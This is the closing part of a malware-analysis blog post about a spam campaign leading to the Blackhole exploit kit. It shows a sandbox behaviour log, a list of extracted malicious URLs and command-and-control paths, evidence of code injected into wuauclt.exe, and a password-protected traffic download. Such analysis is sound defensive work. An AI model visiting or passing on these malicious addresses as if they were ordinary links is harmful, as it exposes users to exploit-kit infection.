File Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %InternetCache%\Content.IE5\Q96OL02U\CAWNUS4D.HTM - CE9C2ED4F9D2B2AABE2F39FFBBB4D585 - 1176 bytes - attr: [] - -
File Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %InternetCache%\Content.IE5\Q96OL02U\CAWNUS4D.HTM - CE9C2ED4F9D2B2AABE2F39FFBBB4D585 - 1176 bytes - attr: [-normal] - -
Directory Created - %ProgramFiles%\Java\jre6\bin\java.exe - C:\WINDOWS\Sun
Directory Created - %ProgramFiles%\Java\jre6\bin\java.exe - C:\WINDOWS\Sun\Java
Directory Created - %ProgramFiles%\Java\jre6\bin\java.exe - C:\WINDOWS\Sun\Java\Deployment
Directory Created - %ProgramFiles%\Java\jre6\bin\java.exe - %AppData%\Sun\Java\Deployment\log
Directory Created - %ProgramFiles%\Java\jre6\bin\java.exe - %AppData%\Sun\Java\Deployment\security
Directory Created - %ProgramFiles%\Java\jre6\bin\java.exe - %AppData%\Sun\Java\Deployment\ext
Directory Created - %ProgramFiles%\Java\jre6\bin\java.exe - %AppData%\Sun\Java\Deployment\cache\6.0\tmp
File Created - %ProgramFiles%\Java\jre6\bin\java.exe - %AppData%\Sun\Java\Deployment\deployment.properties - NOTHING TO HASH - 0 bytes - attr: [] - -
Process Created - C:\WINDOWS\explorer.exe - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - Microsoft Corporation - 55794B97A7FAABD2910873C85274F409 - 93184 bytes
File Modified - %ProgramFiles%\Java\jre6\bin\java.exe - C:\WINDOWS\system32\d3d9caps.dat
File Created - %ProgramFiles%\Java\jre6\bin\java.exe - C:\WINDOWS\system32\d3d9caps.dat - C9508CA14563A81666441FF191D9BB24 - 664 bytes - attr: [] - -
Directory Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %History%\History.IE5\MSHist012012010920120116\
File Deleted - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %History%\History.IE5\MSHist012012011420120115\index.dat - 32768 bytes
Directory Removed - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %History%\History.IE5\MSHist012012011420120115\
Directory Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %History%\History.IE5\MSHist012012012820120129\
Connection Established - C:\WINDOWS\system32\wuauclt.exe - UDP - 8.8.4.4 - 53
Connection Established - C:\WINDOWS\system32\wuauclt.exe - TCP - 118.212.168.131 - 80
Web Request - C:\WINDOWS\system32\wuauclt.exe - POST - kosmovodki .ru - /statnl/image.php
Process Created - C:\WINDOWS\explorer.exe - C:\WINDOWS\system32\verclsid.exe - Microsoft Corporation - 91790D6749EBED90E2C40479C0A91879 - 28672 bytes
Directory Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %AppData%\Macromedia
Directory Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %AppData%\Macromedia\Flash Player
Directory Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %AppData%\Macromedia\Flash Player\#SharedObjects
Directory Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %AppData%\Macromedia\Flash Player\#SharedObjects\FMGLCCCK
Directory Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %AppData%\Macromedia\Flash Player\macromedia.com
Directory Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %AppData%\Macromedia\Flash Player\macromedia.com\support
Directory Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %AppData%\Macromedia\Flash Player\macromedia.com\support\flashplayer
Directory Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %AppData%\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys
File Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %AppData%\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\settings.sxx - NOTHING TO HASH - 0 bytes - attr: [] - -
Web Request - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - GET - matorbaron.com - /content/field.swf
File Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %InternetCache%\Content.IE5\G55SBTS1\field[1].swf - 2435793EE73EFDAF79541977B3C08EEB - 1490 bytes - attr: [] - -
Connection Established - C:\WINDOWS\explorer.exe - TCP - 127.0.0.1 - 5152
Connection Established - C:\WINDOWS\explorer.exe - TCP - 127.0.0.1 - 1079
Connection Established - C:\WINDOWS\explorer.exe - TCP - 65.55.12.249 - 80
Web Request - C:\WINDOWS\explorer.exe - GET - www.microsoft .com - /isapi/redir.dll?prd=ie&pver=6&ar=msnhome
Connection Established - C:\WINDOWS\explorer.exe - TCP - 65.55.206.209 - 80
Web Request - C:\WINDOWS\explorer.exe - GET - home.microsoft .com - /
Connection Established - C:\WINDOWS\explorer.exe - TCP - 94.245.115.205 - 80
Connection Established - %ProgramFiles%\Java\jre6\bin\java.exe - TCP - 50.116.33.235 - 80

Malicious urls extracted:

diamondservice .com.au - /B0bifDVW/js.js
matorbaron .com - /search.php?page=ac2393a35636dfa1
kosmovodki .ru - /statnl/image.php
matorbaron .com - /content/field.swf

As we can see, malicious code is injected in the system process wuauclt.exe:

Connection Established - C:\WINDOWS\system32\wuauclt.exe - UDP - 8.8.4.4 - 53
Connection Established - C:\WINDOWS\system32\wuauclt.exe - TCP - 118.212.168.131 - 80
Web Request - C:\WINDOWS\system32\wuauclt.exe - POST - kosmovodki .ru - /statnl/image.php

Blackhole exploit kit requests:

matorbaron .com - /search.php?page=ac2393a35636dfa1
matorbaron .com - /content/field.swf

Download dumped network traffic (password is urlvoid.com):

sniffed.zip / 17 KB

]]> http://blog.urlvoid.com/spam-your-updated-information-is-necessary-leads-to-blackhole-exploit-kit/feed/ 0